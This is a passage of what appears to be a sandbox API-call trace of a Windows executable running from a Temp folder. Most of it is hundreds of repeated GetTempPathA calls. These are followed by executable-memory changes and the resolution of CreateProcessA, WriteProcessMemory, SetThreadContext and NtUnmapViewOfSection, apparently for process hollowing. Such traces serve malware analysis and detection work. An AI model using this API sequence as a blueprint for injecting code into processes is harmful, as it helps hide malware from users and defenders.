0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: 
lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, 
lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.350] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: 
nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] 
GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 
0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.351] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: 
lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, 
lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: 
nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] 
GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 
0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.354] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.354] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.354] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.354] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.354] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0114.007] VirtualProtect (in: lpAddress=0x193660, dwSize=0x564a0, flNewProtect=0x40, lpflOldProtect=0x12fe48 | out: lpflOldProtect=0x12fe48*=0x4) returned 1 [0114.008] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0114.008] LoadLibraryA (lpLibFileName="user32") returned 0x76b40000 [0114.008] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0114.008] LoadLibraryA (lpLibFileName="kernel32") returned 0x76910000 [0114.008] GetProcAddress (hModule=0x76910000, lpProcName="WinExec") returned 0x7699e5fd [0114.008] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileA") returned 0x7695cee8 [0114.008] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0114.008] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c 
[0114.009] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessA") returned 0x76912082 [0114.009] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadContext") returned 0x76970cc1 [0114.009] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0114.009] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAllocEx") returned 0x7694c1b6 [0114.009] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0114.009] GetProcAddress (hModule=0x76910000, lpProcName="ReadProcessMemory") returned 0x7694c1ce [0114.009] GetProcAddress (hModule=0x76910000, lpProcName="WriteProcessMemory") returned 0x7694c1de [0114.009] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadContext") returned 0x769a0193 [0114.009] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0114.009] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0114.009] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameA") returned 0x769633f6 [0114.009] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineA") returned 0x769698ff [0114.009] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77230000 [0114.009] GetProcAddress (hModule=0x77230000, lpProcName="NtUnmapViewOfSection") returned 0x772769b8 [0114.009] GetProcAddress (hModule=0x76b40000, lpProcName="RegisterClassExA") returned 0x76b46293 [0114.009] GetProcAddress (hModule=0x76b40000, lpProcName="CreateWindowExA") returned 0x76b4bf40 [0114.009] GetProcAddress (hModule=0x76b40000, lpProcName="PostMessageA") returned 0x76b4b446 [0114.009] GetProcAddress (hModule=0x76b40000, lpProcName="GetMessageA") returned 0x76b51899 [0114.009] GetProcAddress (hModule=0x76b40000, lpProcName="DefWindowProcA") returned 0x76b4bb1c [0114.009] RegisterClassExA (param_1=0x12fbc0) returned 0xc13d [0114.950] CreateWindowExA (dwExStyle=0x200, lpClassName="bxVV7cGHPHusOnmHbFKqGnzKMpomaw", 
lpWindowName="ptodEzQlWskupc762Nhc3wjD8apfHQ", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x70140 [0114.965] PostMessageA (hWnd=0x70140, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0114.965] GetMessageA (in: lpMsg=0x12fbf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x12fbf0) returned 1 [0114.965] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x160000 [0114.965] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x160000, nSize=0x2800 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe")) returned 0x30 [0114.966] GetCommandLineA () 